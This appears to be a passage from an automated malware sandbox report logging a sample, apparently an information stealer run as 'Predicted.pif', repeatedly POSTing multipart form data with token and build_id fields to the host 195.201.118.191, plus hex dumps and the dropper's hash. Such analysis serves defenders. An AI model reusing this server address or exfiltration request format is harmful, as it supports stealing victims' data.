2024-08-19 04:06:42 UTC	11445	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 49 49 49 45 47 44 42 4b 4a 4b 45 42 47 43 42 41 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 34 65 65 63 36 36 31 65 66 36 36 34 33 37 34 31 66 64 66 61 32 63 32 31 32 64 65 30 35 34 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 45 47 44 42 4b 4a 4b 45 42 47 43 42 41 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 62 34 37 62 38 37 38 37 35 62 39 37 37 34 61 66 64 64 61 39 62 32 35 32 38 65 33 38 39 64 31 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 45 47 44 42 4b 4a 4b 45 42 47 43 42 41 46 43 46 0d 0a 43 6f 6e 74 Data Ascii: ------HIIIEGDBKJKEBGCBAFCFContent-Disposition: form-data; name="token"894eec661ef6643741fdfa2c212de054------HIIIEGDBKJKEBGCBAFCFContent-Disposition: form-data; name="build_id"1b47b87875b9774afdda9b2528e389d1------HIIIEGDBKJKEBGCBAFCFCont
2024-08-19 04:06:43 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 19 Aug 2024 04:06:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-08-19 04:06:43 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49929	195.201.118.191	443	7684	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Timestamp	Bytes transferred	Direction	Data
2024-08-19 04:06:43 UTC	309	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGIJEGHDAECAKECAFCAK User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Host: 195.201.118.191 Content-Length: 14153 Connection: Keep-Alive Cache-Control: no-cache
2024-08-19 04:06:43 UTC	14153	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 34 65 65 63 36 36 31 65 66 36 36 34 33 37 34 31 66 64 66 61 32 63 32 31 32 64 65 30 35 34 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 62 34 37 62 38 37 38 37 35 62 39 37 37 34 61 66 64 64 61 39 62 32 35 32 38 65 33 38 39 64 31 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 4b 0d 0a 43 6f 6e 74 Data Ascii: ------DGIJEGHDAECAKECAFCAKContent-Disposition: form-data; name="token"894eec661ef6643741fdfa2c212de054------DGIJEGHDAECAKECAFCAKContent-Disposition: form-data; name="build_id"1b47b87875b9774afdda9b2528e389d1------DGIJEGHDAECAKECAFCAKCont
2024-08-19 04:06:44 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 19 Aug 2024 04:06:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-08-19 04:06:44 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49932	195.201.118.191	443	7684	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Timestamp	Bytes transferred	Direction	Data
2024-08-19 04:06:44 UTC	309	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGIJEGHDAECAKECAFCAK User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Host: 195.201.118.191 Content-Length: 14133 Connection: Keep-Alive Cache-Control: no-cache
2024-08-19 04:06:44 UTC	14133	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 34 65 65 63 36 36 31 65 66 36 36 34 33 37 34 31 66 64 66 61 32 63 32 31 32 64 65 30 35 34 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 62 34 37 62 38 37 38 37 35 62 39 37 37 34 61 66 64 64 61 39 62 32 35 32 38 65 33 38 39 64 31 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 4b 0d 0a 43 6f 6e 74 Data Ascii: ------DGIJEGHDAECAKECAFCAKContent-Disposition: form-data; name="token"894eec661ef6643741fdfa2c212de054------DGIJEGHDAECAKECAFCAKContent-Disposition: form-data; name="build_id"1b47b87875b9774afdda9b2528e389d1------DGIJEGHDAECAKECAFCAKCont
2024-08-19 04:06:45 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 19 Aug 2024 04:06:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-08-19 04:06:45 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49934	195.201.118.191	443	7684	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Timestamp	Bytes transferred	Direction	Data
2024-08-19 04:06:45 UTC	309	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGIJEGHDAECAKECAFCAK User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Host: 195.201.118.191 Content-Length: 14129 Connection: Keep-Alive Cache-Control: no-cache
2024-08-19 04:06:45 UTC	14129	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 34 65 65 63 36 36 31 65 66 36 36 34 33 37 34 31 66 64 66 61 32 63 32 31 32 64 65 30 35 34 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 62 34 37 62 38 37 38 37 35 62 39 37 37 34 61 66 64 64 61 39 62 32 35 32 38 65 33 38 39 64 31 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 4b 0d 0a 43 6f 6e 74 Data Ascii: ------DGIJEGHDAECAKECAFCAKContent-Disposition: form-data; name="token"894eec661ef6643741fdfa2c212de054------DGIJEGHDAECAKECAFCAKContent-Disposition: form-data; name="build_id"1b47b87875b9774afdda9b2528e389d1------DGIJEGHDAECAKECAFCAKCont
2024-08-19 04:06:46 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 19 Aug 2024 04:06:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-08-19 04:06:46 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49937	195.201.118.191	443	7684	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Timestamp	Bytes transferred	Direction	Data
2024-08-19 04:06:46 UTC	309	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGIJEGHDAECAKECAFCAK User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Host: 195.201.118.191 Content-Length: 14173 Connection: Keep-Alive Cache-Control: no-cache
2024-08-19 04:06:46 UTC	14173	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 34 65 65 63 36 36 31 65 66 36 36 34 33 37 34 31 66 64 66 61 32 63 32 31 32 64 65 30 35 34 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 62 34 37 62 38 37 38 37 35 62 39 37 37 34 61 66 64 64 61 39 62 32 35 32 38 65 33 38 39 64 31 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 4b 0d 0a 43 6f 6e 74 Data Ascii: ------DGIJEGHDAECAKECAFCAKContent-Disposition: form-data; name="token"894eec661ef6643741fdfa2c212de054------DGIJEGHDAECAKECAFCAKContent-Disposition: form-data; name="build_id"1b47b87875b9774afdda9b2528e389d1------DGIJEGHDAECAKECAFCAKCont
2024-08-19 04:06:47 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 19 Aug 2024 04:06:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-08-19 04:06:47 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49939	195.201.118.191	443	7684	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Timestamp	Bytes transferred	Direction	Data
2024-08-19 04:06:47 UTC	308	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJKFIIIJJKJJKEBGIDGC User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Host: 195.201.118.191 Content-Length: 1977 Connection: Keep-Alive Cache-Control: no-cache
2024-08-19 04:06:47 UTC	1977	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 4b 46 49 49 49 4a 4a 4b 4a 4a 4b 45 42 47 49 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 34 65 65 63 36 36 31 65 66 36 36 34 33 37 34 31 66 64 66 61 32 63 32 31 32 64 65 30 35 34 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 46 49 49 49 4a 4a 4b 4a 4a 4b 45 42 47 49 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 62 34 37 62 38 37 38 37 35 62 39 37 37 34 61 66 64 64 61 39 62 32 35 32 38 65 33 38 39 64 31 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 46 49 49 49 4a 4a 4b 4a 4a 4b 45 42 47 49 44 47 43 0d 0a 43 6f 6e 74 Data Ascii: ------IJKFIIIJJKJJKEBGIDGCContent-Disposition: form-data; name="token"894eec661ef6643741fdfa2c212de054------IJKFIIIJJKJJKEBGIDGCContent-Disposition: form-data; name="build_id"1b47b87875b9774afdda9b2528e389d1------IJKFIIIJJKJJKEBGIDGCCont
2024-08-19 04:06:48 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 19 Aug 2024 04:06:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-08-19 04:06:48 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49941	195.201.118.191	443	7684	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Timestamp	Bytes transferred	Direction	Data
2024-08-19 04:06:49 UTC	308	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKEBFHIJECFIDGDGCGHC User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Host: 195.201.118.191 Content-Length: 3161 Connection: Keep-Alive Cache-Control: no-cache
2024-08-19 04:06:49 UTC	3161	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 34 65 65 63 36 36 31 65 66 36 36 34 33 37 34 31 66 64 66 61 32 63 32 31 32 64 65 30 35 34 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 62 34 37 62 38 37 38 37 35 62 39 37 37 34 61 66 64 64 61 39 62 32 35 32 38 65 33 38 39 64 31 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 0d 0a 43 6f 6e 74 Data Ascii: ------BKEBFHIJECFIDGDGCGHCContent-Disposition: form-data; name="token"894eec661ef6643741fdfa2c212de054------BKEBFHIJECFIDGDGCGHCContent-Disposition: form-data; name="build_id"1b47b87875b9774afdda9b2528e389d1------BKEBFHIJECFIDGDGCGHCCont
2024-08-19 04:06:49 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 19 Aug 2024 04:06:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-08-19 04:06:49 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49943	195.201.118.191	443	7684	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Timestamp	Bytes transferred	Direction	Data
2024-08-19 04:06:50 UTC	308	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JDHJKKFBAEGDGDGCBKEC User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Host: 195.201.118.191 Content-Length: 1697 Connection: Keep-Alive Cache-Control: no-cache
2024-08-19 04:06:50 UTC	1697	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 44 48 4a 4b 4b 46 42 41 45 47 44 47 44 47 43 42 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 34 65 65 63 36 36 31 65 66 36 36 34 33 37 34 31 66 64 66 61 32 63 32 31 32 64 65 30 35 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 48 4a 4b 4b 46 42 41 45 47 44 47 44 47 43 42 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 62 34 37 62 38 37 38 37 35 62 39 37 37 34 61 66 64 64 61 39 62 32 35 32 38 65 33 38 39 64 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 48 4a 4b 4b 46 42 41 45 47 44 47 44 47 43 42 4b 45 43 0d 0a 43 6f 6e 74 Data Ascii: ------JDHJKKFBAEGDGDGCBKECContent-Disposition: form-data; name="token"894eec661ef6643741fdfa2c212de054------JDHJKKFBAEGDGDGCBKECContent-Disposition: form-data; name="build_id"1b47b87875b9774afdda9b2528e389d1------JDHJKKFBAEGDGDGCBKECCont
2024-08-19 04:06:50 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 19 Aug 2024 04:06:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-08-19 04:06:50 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49946	195.201.118.191	443	7684	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Timestamp	Bytes transferred	Direction	Data
2024-08-19 04:06:51 UTC	308	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FHIIEHJKKECGCBFIIJDA User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Host: 195.201.118.191 Content-Length: 1929 Connection: Keep-Alive Cache-Control: no-cache
2024-08-19 04:06:51 UTC	1929	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 48 49 49 45 48 4a 4b 4b 45 43 47 43 42 46 49 49 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 34 65 65 63 36 36 31 65 66 36 36 34 33 37 34 31 66 64 66 61 32 63 32 31 32 64 65 30 35 34 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 49 45 48 4a 4b 4b 45 43 47 43 42 46 49 49 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 62 34 37 62 38 37 38 37 35 62 39 37 37 34 61 66 64 64 61 39 62 32 35 32 38 65 33 38 39 64 31 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 49 45 48 4a 4b 4b 45 43 47 43 42 46 49 49 4a 44 41 0d 0a 43 6f 6e 74 Data Ascii: ------FHIIEHJKKECGCBFIIJDAContent-Disposition: form-data; name="token"894eec661ef6643741fdfa2c212de054------FHIIEHJKKECGCBFIIJDAContent-Disposition: form-data; name="build_id"1b47b87875b9774afdda9b2528e389d1------FHIIEHJKKECGCBFIIJDACont
2024-08-19 04:06:51 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 19 Aug 2024 04:06:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-08-19 04:06:51 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49948	195.201.118.191	443	7684	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Timestamp	Bytes transferred	Direction	Data
2024-08-19 04:06:52 UTC	307	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KEHJKJDGCGDAKFHIDBGC User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Host: 195.201.118.191 Content-Length: 465 Connection: Keep-Alive Cache-Control: no-cache
2024-08-19 04:06:52 UTC	465	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 34 65 65 63 36 36 31 65 66 36 36 34 33 37 34 31 66 64 66 61 32 63 32 31 32 64 65 30 35 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 62 34 37 62 38 37 38 37 35 62 39 37 37 34 61 66 64 64 61 39 62 32 35 32 38 65 33 38 39 64 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 0d 0a 43 6f 6e 74 Data Ascii: ------KEHJKJDGCGDAKFHIDBGCContent-Disposition: form-data; name="token"894eec661ef6643741fdfa2c212de054------KEHJKJDGCGDAKFHIDBGCContent-Disposition: form-data; name="build_id"1b47b87875b9774afdda9b2528e389d1------KEHJKJDGCGDAKFHIDBGCCont
2024-08-19 04:06:52 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 19 Aug 2024 04:06:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-08-19 04:06:52 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49952	195.201.118.191	443	7684	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Timestamp	Bytes transferred	Direction	Data
2024-08-19 04:06:54 UTC	307	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKKJEHCGCGDAAAKFHJKJ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Host: 195.201.118.191 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-08-19 04:06:54 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4b 4a 45 48 43 47 43 47 44 41 41 41 4b 46 48 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 34 65 65 63 36 36 31 65 66 36 36 34 33 37 34 31 66 64 66 61 32 63 32 31 32 64 65 30 35 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 4a 45 48 43 47 43 47 44 41 41 41 4b 46 48 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 62 34 37 62 38 37 38 37 35 62 39 37 37 34 61 66 64 64 61 39 62 32 35 32 38 65 33 38 39 64 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 4a 45 48 43 47 43 47 44 41 41 41 4b 46 48 4a 4b 4a 0d 0a 43 6f 6e 74 Data Ascii: ------KKKJEHCGCGDAAAKFHJKJContent-Disposition: form-data; name="token"894eec661ef6643741fdfa2c212de054------KKKJEHCGCGDAAAKFHJKJContent-Disposition: form-data; name="build_id"1b47b87875b9774afdda9b2528e389d1------KKKJEHCGCGDAAAKFHJKJCont
2024-08-19 04:06:54 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 19 Aug 2024 04:06:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-08-19 04:06:54 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49954	195.201.118.191	443	7684	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Timestamp	Bytes transferred	Direction	Data
2024-08-19 04:06:55 UTC	307	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFCBAEBAEBFHCAKFCAKE User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Host: 195.201.118.191 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-08-19 04:06:55 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 46 43 42 41 45 42 41 45 42 46 48 43 41 4b 46 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 34 65 65 63 36 36 31 65 66 36 36 34 33 37 34 31 66 64 66 61 32 63 32 31 32 64 65 30 35 34 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 41 45 42 41 45 42 46 48 43 41 4b 46 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 62 34 37 62 38 37 38 37 35 62 39 37 37 34 61 66 64 64 61 39 62 32 35 32 38 65 33 38 39 64 31 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 41 45 42 41 45 42 46 48 43 41 4b 46 43 41 4b 45 0d 0a 43 6f 6e 74 Data Ascii: ------AFCBAEBAEBFHCAKFCAKEContent-Disposition: form-data; name="token"894eec661ef6643741fdfa2c212de054------AFCBAEBAEBFHCAKFCAKEContent-Disposition: form-data; name="build_id"1b47b87875b9774afdda9b2528e389d1------AFCBAEBAEBFHCAKFCAKECont
2024-08-19 04:06:56 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 19 Aug 2024 04:06:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-08-19 04:06:56 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	00:02:54
Start date:	19/08/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xf0000
File size:	1'916'928 bytes
MD5 hash:	44AE545CA405437B73165B8247A83569
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
